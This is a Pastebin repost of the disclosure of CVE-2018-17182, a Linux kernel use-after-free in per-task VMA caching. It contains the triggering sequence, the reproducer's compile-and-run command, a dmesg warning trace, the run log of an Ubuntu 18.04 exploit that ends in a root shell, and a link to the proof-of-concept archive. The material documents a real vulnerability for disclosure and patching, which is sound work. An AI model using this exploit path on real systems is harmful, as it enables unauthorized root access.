SHARE
TWEET

CVE-2018-17182

TVT618 Sep 28th, 2018 1,016 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Since commit 615d6e8756c8 ("mm: per-thread vma caching", first in 3.15),
  2. Linux has per-task VMA caches that contain up to four VMA pointers for
  3. fast lookup. VMA caches are invalidated by bumping the 32-bit per-mm
  4. sequence number mm->vmacache_seqnum; when the sequence number wraps,
  5. vmacache_flush_all() scans through all running tasks and wipes the
  6. VMA caches of all tasks that share current's mm.
  7.  
  8. In commit 6b4ebc3a9078 ("mm,vmacache: optimize overflow system-wide
  9. flushing", first in 3.16), a bogus fastpath was added that skips the
  10. invalidation on overflow if current->mm->mm_users==1. This means that
  11. the following sequence of events triggers a use-after-free:
  12.  
  13. [A starts as a singlethreaded process]
  14. A: create mappings X and Y (in separate memory areas
  15.    far away from other allocations)
  16. A: perform repeated invalidations until
  17.    current->mm->vmacache_seqnum==0xffffffff and
  18.    current->vmacache.seqnum==0xfffffffe
  19. A: dereference an address in mapping Y that is not
  20.    paged in (thereby populating A's VMA cache with
  21.    Y at seqnum 0xffffffff)
  22. A: unmap mapping X (thereby bumping
  23.    current->mm->vmacache_seqnum to 0)
  24. A: without any more find_vma() calls (which could
  25.    happen e.g. via pagefaults), create a thread B
  26. B: perform repeated invalidations until
  27.    current->mm->vmacache_seqnum==0xfffffffe
  28. B: unmap mapping Y (thereby bumping
  29.    current->mm->vmacache_seqnum to 0xffffffff)
  30. A: dereference an address in the freed mapping Y
  31.    (or any address that isn't present in the
  32.    pagetables and doesn't correspond to a valid
  33.    VMA cache entry)
  34.  
  35. A's VMA cache is still at sequence number 0xffffffff from before the
  36. overflow. The sequence number has wrapped around in the meantime, back
  37. to 0xffffffff, and A's outdated VMA cache is considered to be valid.
  38.  
  39.  
  40. I am attaching the following reproduction files:
  41.  
  42. vmacache-debugging.patch: Kernel patch that adds some extra logging for
  43.                           VMA cache internals.
  44. vma_test.c: Reproducer code
  45. dmesg: dmesg output of running the reproducer in a VM
  46.  
  47. In a Debian 9 VM, I've tested the reproducer against a 4.19.0-rc3+
  48. kernel with vmacache-debugging.patch applied, configured with
  49. CONFIG_DEBUG_VM_VMACACHE=y.
  50.  
  51. Usage:
  52.  
  53. user@debian:~/vma_bug$ gcc -O2 -o vma_test vma_test.c -g && ./vma_test
  54. Segmentation fault
  55.  
  56.  
  57. Within around 40 minutes, I get the following warning in dmesg:
  58.  
  59. =============================================
  60. [ 2376.292518] WARNING: CPU: 0 PID: 1103 at mm/vmacache.c:157 vmacache_find+0xbb/0xd0
  61. [ 2376.296813] Modules linked in: btrfs xor zstd_compress raid6_pq
  62. [ 2376.300095] CPU: 0 PID: 1103 Comm: vma_test Not tainted 4.19.0-rc3+ #161
  63. [ 2376.303650] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1 04/01/2014
  64. [ 2376.305796] RIP: 0010:vmacache_find+0xbb/0xd0
  65. [ 2376.306963] Code: 48 85 c0 74 11 48 39 78 40 75 1f 48 39 30 77 06 48 39 70 08 77 19 83 c2 01 83 fa 04 41 0f 44 d1 83 e9 01 75 c7 31 c0 c3 f3 c3 <0f> 0b 31 c0 c3 65 48 ff 05 98 97 9b 6a c3 90 90 90 90 90 90 90 0f
  66. [ 2376.311881] RSP: 0000:ffffa934c1e3bec0 EFLAGS: 00010283
  67. [ 2376.313258] RAX: ffff8ac7eaf997d0 RBX: 0000133700204000 RCX: 0000000000000004
  68. [ 2376.315165] RDX: 0000000000000001 RSI: 0000133700204000 RDI: ffff8ac7f3820dc0
  69. [ 2376.316998] RBP: ffff8ac7f3820dc0 R08: 0000000000000001 R09: 0000000000000000
  70. [ 2376.318789] R10: 0000000000000000 R11: 0000000000000000 R12: ffffa934c1e3bf58
  71. [ 2376.320590] R13: ffff8ac7f3820dc0 R14: 0000000000000055 R15: ffff8ac7e9355140
  72. [ 2376.322481] FS:  00007f96165ca700(0000) GS:ffff8ac7f3c00000(0000) knlGS:0000000000000000
  73. [ 2376.324620] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
  74. [ 2376.326101] CR2: 0000133700204000 CR3: 0000000229d28001 CR4: 00000000003606f0
  75. [ 2376.327906] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
  76. [ 2376.329819] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
  77. [ 2376.331571] Call Trace:
  78. [ 2376.332208]  find_vma+0x16/0x70
  79. [ 2376.332991]  ? vfs_read+0x10f/0x130
  80. [ 2376.333852]  __do_page_fault+0x191/0x470
  81. [ 2376.334816]  ? async_page_fault+0x8/0x30
  82. [ 2376.335776]  async_page_fault+0x1e/0x30
  83. [ 2376.336746] RIP: 0033:0x555e2a2b4c37
  84. [ 2376.337600] Code: 05 80 e8 9c fc ff ff 83 f8 ff 0f 84 ad 00 00 00 8b 3d 81 14 20 00 e8 48 02 00 00 48 b8 00 40 20 00 37 13 00 00 bf 37 13 37 13 <c6> 00 01 31 c0 e8 cf fc ff ff 48 83 ec 80 31 c0 5b 5d 41 5c c3 48
  85. [ 2376.342085] RSP: 002b:00007ffd505e8d30 EFLAGS: 00010206
  86. [ 2376.343334] RAX: 0000133700204000 RBX: 0000000100000000 RCX: 00007f9616102700
  87. [ 2376.345133] RDX: 0000000000000008 RSI: 00007ffd505e8d18 RDI: 0000000013371337
  88. [ 2376.346834] RBP: 00007f96165e4000 R08: 0000000000000000 R09: 0000000000000000
  89. [ 2376.348889] R10: 0000000000000001 R11: 0000000000000246 R12: 0000000100000000
  90. [ 2376.350570] R13: 00007ffd505e8ea0 R14: 0000000000000000 R15: 0000000000000000
  91. [ 2376.352246] ---[ end trace 995fa641c5115cfb ]---
  92. [ 2376.353406] vma_test[1103]: segfault at 133700204000 ip 0000555e2a2b4c37 sp 00007ffd505e8d30 error 6 in vma_test[555e2a2b4000+2000]
  93. =============================================
  94.  
  95. The source code corresponding to the warning, which is triggered because
  96. the VMA cache references a VMA struct that has been reallocated to
  97. another process in the meantime:
  98.  
  99. #ifdef CONFIG_DEBUG_VM_VMACACHE
  100.             if (WARN_ON_ONCE(vma->vm_mm != mm))
  101.                 break;
  102. #endif
  103.  
  104.  
  105. ################################################################################
  106.  
  107.  
  108. Attaching an ugly exploit for Ubuntu 18.04, kernel linux-image-4.15.0-34-generic at version 4.15.0-34.37. It takes about an hour to run before popping a root shell. Usage: First compile with ./compile.sh, then run ./puppeteer. Example run:
  109.  
  110. user@ubuntu-18-04-vm:~/vmacache$ ./puppeteer
  111. Do Sep 20 23:55:11 CEST 2018
  112. puppeteer: old kmsg consumed
  113. got map from child!
  114. got WARNING
  115. got RSP line: 0xffff9e0bc2263c60
  116. got RAX line: 0xffff8c7caf1d61a0
  117. got RDI line: 0xffff8c7c214c7380
  118. reached WARNING part 2
  119. got R8 line: 0xffffffffa7243680
  120. trace consumed
  121. offset: 0x110
  122. fake vma pushed
  123. suid file detected, launching rootshell...
  124. we have root privs now...
  125. Fr Sep 21 00:48:00 CEST 2018
  126. root@ubuntu-18-04-vm:~/vmacache#
  127.  
  128.  
  129. Proof of Concept:
  130. https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45497.zip
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top